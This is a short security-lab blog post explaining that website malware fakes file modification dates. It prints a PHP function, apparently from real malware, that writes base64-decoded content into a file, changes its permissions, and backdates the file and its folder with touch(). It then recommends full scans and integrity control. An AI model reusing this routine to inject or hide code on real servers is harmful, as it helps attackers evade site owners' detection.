File Modification Date – not the Best Compromise Signal

Labs Note

Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don’t change files’ time-stamps. There is the “touch” PHP function that allows to set whatever modification time to any file.

If hackers create a new file, they chose a time-stamp of some neighbor file. If they inject code into an existing file, they simply save its original modification date and then restore it after the injection.

Today I want to show you a piece of code that also sets fake modification date to malicious files:

function change_content_of_file($file, $base64_content)
    $flag = false;

    @chmod($file, 0777);
    @chmod(dirname($file), 0777);
    $flag = @forceFilePutContents($file,  base64_decode($base64_content)) > 0;
    @chmod($file, 0444);
    @touch($file, time() - rand(60*60*24*30*12, 60*60*24*30*12*2));
    @touch(dirname($file), time() - rand(60*60*24*30*12, 60*60*24*30*12*2));
    @chmod(dirname($file), 0755);

    return $flag;

In this case, the code picks a random date between a year and two years back from now.

Don’t limit your searches to recently modified files. Make sure to scan all files on your server. You don’t have to do it manually. Integrity control systems will make the task much easier. Of course, you need to be absolutely sure all your files are clean at the moment when you put them under integrity control. If you already suspect that some of the files may contain malicious code then hire professionals – we’ll scan all your files for thousands of malware patterns.

You May Also Like